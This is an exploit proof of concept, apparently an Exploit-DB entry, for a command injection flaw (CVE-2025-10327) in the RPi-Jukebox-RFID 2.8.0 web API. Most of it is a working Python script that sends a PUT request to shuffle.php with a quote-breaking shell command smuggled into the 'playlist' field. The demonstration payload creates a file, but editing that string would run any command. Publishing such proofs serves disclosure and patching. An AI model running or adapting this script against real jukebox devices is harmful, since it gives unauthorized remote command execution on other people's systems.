RPi-Jukebox-RFID 2.8.0 - Remote Command Execution

# Exploit Title: RPi-Jukebox-RFID 2.8.0 - Remote Code Execution 
# Date: 2025-09-25
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://github.com/MiczFlor/RPi-Jukebox-RFID
# Software Link: https://github.com/MiczFlor/RPi-Jukebox-RFID/releases/tag/v2.8.0
# Version: 2.8.0
# Tested on: Raspberry Pi OS with RPi-Jukebox-RFID v2.8.0
# CVE: CVE-2025-10327
#
# Description:
# This PoC demonstrates an OS command injection vulnerability in the shuffle.php API endpoint.
# The vulnerable parameter "playlist" is passed directly to a shell command without sanitization,
# allowing an attacker to execute arbitrary system commands.

import requests
import json

# Replace this with the actual target IP or hostname
TARGET = "http://YOUR-TARGET-IP/phoniebox/api/playlist/shuffle.php"

# Payload to inject – here we create a file as proof of execution
INJECTED_COMMAND = "test';touch rced_by_xu17.txt;echo '"

# JSON payload for the request
payload = {
    "playlist": INJECTED_COMMAND,
    "shuffle": "true"
}

# HTTP headers
headers = {
    "Content-Type": "application/json",
    "User-Agent": "Mozilla/5.0"
}

def exploit():
    print("[+] Sending malicious JSON payload to trigger command injection...")
    try:
        response = requests.put(TARGET, headers=headers, data=json.dumps(payload), timeout=5)
        print(f"[+] HTTP Status Code: {response.status_code}")
        print("[*] If the target is vulnerable, the command should be executed on the server.")
    except Exception as e:
        print(f"[-] Exploit failed: {e}")

if __name__ == "__main__":
    exploit()